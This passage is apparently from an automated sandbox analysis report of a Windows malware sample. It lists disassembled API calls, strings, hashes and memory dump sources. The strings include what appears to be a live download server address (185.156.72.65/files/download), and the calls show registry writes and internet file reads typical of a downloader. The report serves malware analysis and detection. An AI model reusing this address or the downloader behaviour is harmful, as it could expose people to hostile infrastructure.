                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                        • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                        • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                        Strings
                        • SleepConditionVariableCS, xrefs: 00409C11
                        • kernel32.dll, xrefs: 00409C00
                        • WakeAllConditionVariable, xrefs: 00409C1D
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 2565136772-3242537097
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                        • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                        • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                        • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                        • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                        • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                        APIs
                        • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                        • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                        • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                        • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                        • String ID: csm$csm$csm
                        • API String ID: 2751267872-393685449
                        • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                        • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                        • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                        APIs
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenSleepValue
                        • String ID: 185.156.72.65$185.156.72.65$mixone
                        • API String ID: 4111408922-485810328
                        • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                        • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                        • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                        • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                        • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                        • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                        • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                        • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                        • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID:
                        • API String ID: 2565136772-0
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                        • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                        • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                          • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                        • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65$string too long
                        • API String ID: 2123813255-2459586365
                        • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                        • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 0040B837
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                        • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                        • _ValidateLocalCookies.LIBCMT ref: 0040B948
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                        APIs
                        • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                        • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                        APIs
                        • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                        • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                          • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                        • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65
                        • API String ID: 2123813255-1765470537
                        • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                        • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B6DBD0D4,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                        • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                        • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                        APIs
                        • __alloca_probe_16.LIBCMT ref: 004150D5
                        • __alloca_probe_16.LIBCMT ref: 0041519E
                        • __freea.LIBCMT ref: 00415205
                          • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        • __freea.LIBCMT ref: 00415218
                        • __freea.LIBCMT ref: 00415225
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                        • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                        • String ID:
                        • API String ID: 2509773233-0
                        • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                        • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004013BB
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 2296764815-3011832937
                        • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                        • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04951622
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 4132704954-3011832937
                        • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                        • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                        • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                        • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                        APIs
                        • GetConsoleOutputCP.KERNEL32(B6DBD0D4,00000000,00000000,00000000), ref: 0041972F
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                        • GetLastError.KERNEL32 ref: 00419A6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                        • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                        APIs
                        • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                          • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                        • GetLastError.KERNEL32 ref: 04969CD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                        • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID:
                        • API String ID: 3197321146-0
                        • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                        • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
